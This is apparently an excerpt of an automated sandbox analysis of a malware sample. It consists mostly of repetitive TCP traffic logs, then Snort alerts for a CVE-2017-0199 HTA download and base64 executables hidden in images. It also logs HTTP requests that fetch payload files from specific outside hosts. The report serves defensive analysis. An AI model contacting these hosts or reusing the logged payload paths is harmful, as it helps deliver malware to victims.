                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.185.89.92:80
                    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 198.46.178.144:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 94.156.65.247:80
                    Source: global trafficTCP traffic: 94.156.65.247:80 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 94.156.65.247:80
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 94.156.65.247:80
                    Source: global trafficTCP traffic: 94.156.65.247:80 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 94.156.65.247:80 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 94.156.65.247:80 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 94.156.65.247:80
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.46.178.144:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.92.254.194:80
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49171

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2024449 ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl 192.168.2.22:49166 -> 198.46.178.144:80
                    Source: TrafficSnort IDS: 2024449 ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl 192.168.2.22:49168 -> 198.46.178.144:80
                    Source: TrafficSnort IDS: 2047750 ET TROJAN Base64 Encoded MZ In Image 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: TrafficSnort IDS: 2018856 ET TROJAN Windows executable base64 encoded 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: TrafficSnort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 91.92.254.194:80 -> 192.168.2.22:49171
                    Source: TrafficSnort IDS: 2020424 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1 198.46.178.144:80 -> 192.168.2.22:49172
                    Source: C:\Windows\System32\wscript.exeNetwork Connect: 94.156.65.247 80Jump to behavior
                    Source: Yara matchFile source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.powershell.exe.12778558.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /madamwebbbbbbbas6444.txt HTTP/1.1Host: 198.46.178.144Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 192.185.89.92 192.185.89.92
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewASN Name: TERASYST-ASBG TERASYST-ASBG
                    Source: Joe Sandbox ViewASN Name: THEZONEBG THEZONEBG
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDNS query: name: ip-api.com
